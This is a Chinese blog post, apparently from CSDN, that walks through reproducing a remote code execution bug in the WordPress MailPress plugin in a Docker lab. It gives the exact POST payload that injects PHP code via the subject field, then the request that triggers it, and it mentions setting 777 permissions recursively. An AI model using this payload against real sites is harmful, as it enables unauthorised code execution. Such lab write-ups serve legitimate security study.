WordPress-Mailpress远程代码执行漏洞复现

最新推荐文章于 2024-08-03 15:54:11 发布
最新推荐文章于 2024-08-03 15:54:11 发布
阅读量1.8k 收藏 1
点赞数
分类专栏: cms漏洞 文章标签: wordpress
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ping_Pig/article/details/102906932
版权

插件简介:

Mailpress是一个比较流行的邮件插件。

插件下载Plugin Directory:https://wordpress.org/plugins/mailpress/

漏洞复现:

漏洞详解地址:https://github.com/Medicean/VulApps/tree/master/w/wordpress/2

Docker镜像地址:

docker pull medicean/vulapps:w_wordpress_2

启动环境

docker run -d -p 8000:80 medicean/vulapps:w_wordpress_2

PoC 使用

使用攻击代码触发漏洞

http://你的 IP 地址:端口号/wp-content/plugins/mailpress/mp-includes/action.php

首先访问这个这个链接:

 

抓取上面那个页面的数据包并修改请求方式为post,并且加上如下post请求参数:

action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1

返回包里的id记下來

然后访问下面链接:

127.0.0.1:8000/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=6

 

复现成功!!!

修复方式:

及时打上官方补丁

PS:(一开始我是使用自己搭建的Wordpress,然后自己下载插件了按照正常安装流程走【正常流程:下载插件压缩包-->打开后台-->选择插件-->上传压缩包-->选择安装-->安装】,但是我出现了如下几个问题:1:上传文件大小限制(修改php.ini文件中的上传文件大小限制)2:目录读写的问题(给wordpress所在的目录的父母了递归777权限)3:上传成功,开始安装后出现输入FTP账号密码(到这我没弄了),4:我解压插件压缩包后,直接放到wordpress的插件文件内,刷新页面后,点击激活该插件时,出现一堆错误。我就放弃了,使用docker一键搭建。所以我推荐使用docker,没事儿多玩玩docker!!!)

Ping_Pig
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
简单了解cms,复现vulhub中的wordpress漏洞
weixin_64655821的博客
09-12 1050
简单了解cms,复现vulhub中的wordpress漏洞
wordpress-4.8.1-zh_CN.tar.gz
10-27
这个名为"wordpress-4.8.1-zh_CN.tar.gz"的压缩包文件,正是WordPress 4.8.1版本的中文版,旨在为中文用户带来更加友好的使用体验。 WordPress 4.8.1是这个开源项目的稳定版本,它在前一个版本的基础上进行了多方面...
Wordpress漏洞复现
weixin_52194536的博客
09-10 8961
cms漏洞
漏洞复现WordPress——Recall——SQL注入(CVE-2024-32709)
LongL_GuYu的博客
07-11 781
Plechev Andrey WP-Recall存在SQL注入漏洞。该漏洞影响WP-Recall版本从n/a到16.26.5。攻击者可以利用该漏洞在SQL命令中不恰当地中立化特殊元素,造成数据库被恶意操作的风险。
wordpress漏洞复现
最新发布
cheapkiller的博客
08-03 359
点击【外观】——>【编辑】选择404.php并将文件改为我们的一句话木马。然后我们访问刚刚修改的文件内容说明我们注入成功就可以了。
WolrdPress漏洞复现
m0_47968686的博客
01-05 714
靶机Web Developer渗透 实验步骤和内容: 目的:获取靶机Web Developer 文件/root/flag.txt中flag。 基本思路:本网段IP地址存活扫描(netdiscover);网络扫描(Nmap);浏览HTTP 服务;网站目录枚举(Dirb);发现数据包文件 “cap”;分析 “cap” 文件,找到网站管理后台账号密码;插件利用(有漏洞);利用漏洞获得服务器账号密码;SSH 远程登录服务器;tcpdump另类应用。 主机发现 使用nmap -s机 192.168.131.0/24扫
墨者学院-WordPress 远程命令执行漏洞(CVE-2018-15877)复现
ploto_cs的博客
10-08 590
1.访问目标网站 2.使用御剑对域名进行探测 常用HTTP响应码: 200一交易成功 302一跳转 400一错误请求 403一禁止访问 404一未发现目标 500一内部服务器错误 3.发现存在登录的网址 网址:http://219.153.49.228:46188/wp-admin/ 4.使用BP对网站后台账户密码进行爆破 通过使用暴力破解可以得到 User:admin Password:123qwe 5.登录后台 因为是Activity Monitor插件远程命令执行漏洞 Activity Mon
WordPress 5.0.0远程代码执行漏洞研究.pdf
09-09
WordPress 5.0.0 远程代码执行漏洞研究》这篇文章主要探讨了在互联网高速发展的背景下,Web应用程序的安全问题日益突出。随着开源软件的广泛应用,其安全性问题引起了安全从业者们的广泛关注。开源软件在当前网络...
wordpress-6.4.2-zh_CN.zip
12-29
2. **函数与钩子**:了解 WordPress 的函数和钩子机制,开发者可以编写自定义功能,例如通过动作钩子在特定时机执行代码,过滤钩子则可以改变数据输出。 3. **REST API**:WordPress 的 REST API 允许开发者以 JSON...
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661.pdf
09-27
WordPress 5.8.3 SQL注入漏洞 CVE-2022-21661】是一个近期发现的安全问题,涉及到WordPress的核心函数`WP_Query`。这个漏洞并非直接的SQL注入,但因为`WP_Query`经常被WordPress插件广泛使用,所以其潜在的危害...
wordpress 4.6任意命令执行漏洞(PwnScriptum)复现
永远是少年
12-31 1520
今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞(PwnScriptum)复现。 一、wordpress 4.6任意命令执行漏洞(PwnScriptum)简介与靶场搭建 二、wordpress 4.6任意命令执行漏洞(PwnScriptum)复现
漏洞复现-wordpress RCE-CVE-2024-25600
04-12 537
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
WordPress插件SQL注入漏洞——漏洞复现
W小哥
11-25 8497
复现过程 环境地址:https://www.mozhe.cn/bug/detail/S0JTL0F4RE1sY2hGdHdwcUJ6aUFCQT09bW96aGUmozhe 访问目标网站 常规工具AWVS扫描是扫不出来漏洞的 第一步识别CMS vulnx -u http://219.153.49.228:47712/ --cms wpscan --url http://219.153.49.228:47712/ 给API的token才能将结果输出 ...
Vulhub靶场WordPress4.6命令执行(PwnScriptum)漏洞复现
X_python321的博客
07-11 660
WordPress是使用PHP语言开发的博客平台,用户可以在支持PHP和MySQL数据库的服务器上架设属于自己的网站。WordPress会使用PHPMailer组件发送邮件,攻击者在找回密码时通过PHPMailer组件发送重置密码的邮件,利用substr,run等函数构造payload,可造成命令执行漏洞
WordPress4.6命令执行漏洞(CVE-2016-10033)复现教程---保姆级教程
爱吃仡坨的Blog
09-11 3480
WordPress 使用 PHPMailer 组件向用户发送邮件。PHPMailer(版本 < 5.2.18)存在远程命令执行漏洞,攻击者只需巧妙地构造出一个恶意邮箱地址,即可写入任意文件,(phpmailer组件调用linux系统命令sendmail进行邮件发送,通过传入的SERVER_NAME获取主机名(即请求host值),而SERVER_NAME没有经过任何过滤,从而产生漏洞,而exim4替代了sendmail的功能,即可以利用substr,run函数等进入绕过,构造payload)造成远程命令执行
(CVE-2022-21661)WordPress SQL 注入漏洞分析和复现
weixin_50464560的博客
09-07 4917
转载https://www.freebuf.com/articles/web/321297.html。
wordpress4.6 任意命令执行漏洞复现
小小猪的博客
12-01 1750
wordpress01 任意命令执行漏洞复现 简介: WordPress 是一种使用 PHP 语言开发的博客平台,用户可以在支持 PHP 和 MySQL 数据库的服务器上架设属于自己的网站。也可以把 WordPress 当作一个内容管理系统(CMS)来使用。 影响版本 WordPress <= 4.6.0 PHPMailer < 5.2.18 环境搭建: 这里采用安鸾渗透实战平台 地址 漏洞复现: 先用wpscan进行扫面,发现版本号 搜索发现,4.6版本的wordpre.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值